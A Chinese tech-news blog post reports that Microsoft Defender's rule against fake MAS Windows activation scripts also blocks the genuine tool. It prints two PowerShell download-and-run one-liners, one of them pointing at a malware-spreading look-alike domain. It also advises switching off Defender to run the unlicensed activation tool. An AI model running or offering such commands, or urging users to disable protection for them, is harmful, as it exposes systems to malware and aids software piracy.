微软显然也知道 MAS 在线激活工具,看起来微软也同样知道有黑客注册类似域名发布虚假的 MAS 激活工具来传播恶意软件,所以微软通过 Microsoft Defender 自动拦截虚假的 MAS 激活工具。
然而不幸的是微软在处理规则时似乎出现意外,因为真正的 MAS 激活工具现在同样被拦截,这导致用户在 PowerShell 中执行激活命令时将会因为被拦截而直接报错。
图片来源:@Massgrave
那怎么知道微软不是有意要封杀真的 MAS 激活工具呢?在 Microsoft Defender 拦截记录里,微软提到的名称是 Trojan:PowerShell/FakeMas.DA!MTB
考虑到关于虚假 MAS 激活工具是最近才出现的并且 MAS 开发团队也在 X/Twitter 上公布了这件事,再加上微软的拦截动作也是近期开始的,这基本可以判断微软压根没想着拦截真正的 MAS 激活工具。
只是正版和恶意软件版仅在域名商有个字母的差异:
# 真正的 MAS 激活工具命令如下irm https://get.activated.win | iex # 携带病毒的假冒版本域名后少了个 dirm hxxps://get.activate.win | iex
微软在处理拦截规则时应该是不慎将真正的 MAS 激活工具域名给拦截了,手头暂时没有虚拟机没法测试,不然蓝点网高低得试试钓鱼版是否被成功拦截,千万别是微软拦截错了放行钓鱼版把真正的 MAS 激活工具给拦截了。
现在摆在用户面前的问题是,Microsoft Defender 默认情况是开启的,因此用户在执行激活命令前必须先进入安全中心禁用这种安全防护,待成功激活后再开启各种安全防护即可。
这里还需要再次强调请执行激活命令时一定要认准域名,不然关闭防护的同时还执行钓鱼版激活命令那系统可能就会被安装恶意软件,后续可能会造成数据泄露等安全问题。